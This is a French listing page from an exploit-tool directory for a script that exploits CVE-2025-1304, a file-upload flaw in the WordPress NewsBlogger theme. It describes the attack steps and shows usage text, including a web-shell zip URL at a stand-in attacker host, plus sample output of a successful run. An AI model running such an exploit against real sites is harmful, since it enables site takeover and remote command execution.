Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-1304 — Le thème WordPress NewsBlogger <= 0.2.5.1 est vulnérable au téléchargement de fichier arbitraire. | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-1304
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-1304

CVE-2025-1304

Le thème WordPress NewsBlogger <= 0.2.5.1 est vulnérable au téléchargement de fichier arbitraire.

Voir le dépôt
21il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 Thème WordPress NewsBlogger <= 0.2.5.1 - Téléchargement arbitraire de fichier (CVE-2025-1304)

Score CVSS : 8.8 (Élevé)
Type de vulnérabilité : Téléchargement arbitraire de fichier
Composant : Thème WordPress
Identifiant CVE : CVE-2025-1304


🔥 Aperçu de la vulnérabilité

Le thème WordPress NewsBlogger (versions <= 0.2.5.1) est vulnérable à un téléchargement arbitraire de fichier via le panneau d'accueil administrateur.

Cette vulnérabilité permet à tout utilisateur authentifié — y compris ceux disposant du rôle minimal Abonné — de télécharger une archive .zip malveillante contenant un shell web.
Le téléchargement s'effectue via un champ d'URL de plugin non validé, qui ne parvient pas à vérifier correctement le contenu ou le type du fichier téléchargé.

Une attaque réussie pourrait entraîner la compromission complète du site Web, y compris l'exécution de commandes à distance et l'escalade de privilèges.


🧠 Détails du script

Ce script Python automatise l'exploitation de la vulnérabilité en :

  • Se connecter en utilisant les identifiants administrateur fournis.
  • Extraire dynamiquement le nonce de la page d'accueil vulnérable.
  • Télécharger un plugin malveillant distant via le point de terminaison AJAX vulnérable.

  • ⚙️ Instructions d'utilisation

    root@kitploit:~
    python CVE-2025-1304.py -h
    
    root@kitploit:~
    usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB
    
    WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )
    
    options:
      -h, --help                show this help message and exit
      --url, -u URL             Target base URL (e.g., http://target/wordpress)
      --username, -un USERNAME WordPress admin username
      --password, -p PASSWORD   WordPress admin password
      --shellweb, -shell SHELLWEB
                               Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)
    

    📤 Exemple de sortie

    root@kitploit:~
    [+] Logging in to http://target/wordpress/wp-login.php
    [+] Logged in successfully.
    [+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
    [+] Extracted nonce: 012818100b
    [+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
    [+] Server response:
    {"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}
    

    ⚠️ Avertissement

    Ce code est fourni à des fins éducatives et de tests de sécurité autorisés uniquement.
    L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.


    Par : Nxploited ( Khaled Alenazi )

    Télécharger l’outil